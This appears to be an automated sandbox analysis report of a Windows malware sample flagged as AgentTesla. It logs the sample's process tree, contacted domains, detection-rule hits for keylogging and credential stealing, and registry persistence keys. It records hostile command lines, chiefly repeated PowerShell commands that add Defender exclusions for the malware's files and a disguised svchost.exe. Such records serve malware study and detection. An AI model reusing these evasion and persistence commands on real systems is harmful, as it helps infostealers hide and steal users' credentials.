Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 21, 2021, 8:25 p.m. | June 21, 2021, 8:27 p.m. |
-
-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
7232 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
7112 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
8300 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
2508 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
4376 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
4764 -
t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
3632-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2200 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
8144 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
8388 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
1436 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
7396 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
3680 -
-
timeout.exe timeout 1
1636
-
-
t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
5936
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
8604 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
7352 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
3292 -
-
timeout.exe timeout 1
7196
-
-
-
Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe" -m "C:\Users\test22\AppData\Local\Temp\HostStartups.exe"
6496-
AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
5444 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
7044 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
8676 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
6888 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
4492 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
6236 -
-
timeout.exe timeout 1
6812
-
-
Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe"
8532
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apdocroto.gq | 172.67.158.27 | |
dontreachme3.ddns.net | 95.90.186.169 |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html |
domain | dontreachme3.ddns.net |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html |
request | GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html |
file | C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe |
file | C:\Users\test22\AppData\Roaming\Install\Host.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat |
file | C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
file | C:\Users\test22\AppData\Roaming\Install\Host.exe |
file | C:\Users\test22\AppData\Roaming\Install\Host.exe |
file | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe |
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Win.Trojan.agentTesla | rule | Win_Trojan_agentTesla_Zero | ||||||
description | Google Chrome User Data Check | rule | Chrome_User_Data_Check_Zero | ||||||
description | email clients info stealer | rule | infoStealer_emailClients_Zero | ||||||
description | browser info stealer | rule | infoStealer_browser_Zero | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Win.Trojan.agentTesla | rule | Win_Trojan_agentTesla_Zero | ||||||
description | Google Chrome User Data Check | rule | Chrome_User_Data_Check_Zero | ||||||
description | email clients info stealer | rule | infoStealer_emailClients_Zero | ||||||
description | browser info stealer | rule | infoStealer_browser_Zero | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Win.Trojan.agentTesla | rule | Win_Trojan_agentTesla_Zero | ||||||
description | Google Chrome User Data Check | rule | Chrome_User_Data_Check_Zero | ||||||
description | email clients info stealer | rule | infoStealer_emailClients_Zero | ||||||
description | browser info stealer | rule | infoStealer_browser_Zero | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
cmdline | "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run |
host | 172.217.25.14 |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 | reg_value | C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 | reg_value | C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4 | reg_value | C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\javaupdate | reg_value | C:\Users\test22\AppData\Roaming\Install\Host.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{84R20A67-Q1HP-57Q4-5F1G-A71A01846283}\StubPath | reg_value | "C:\Users\test22\AppData\Roaming\Install\Host.exe" |
file | C:\Users\test22\AppData\Roaming\Install\Host.exe |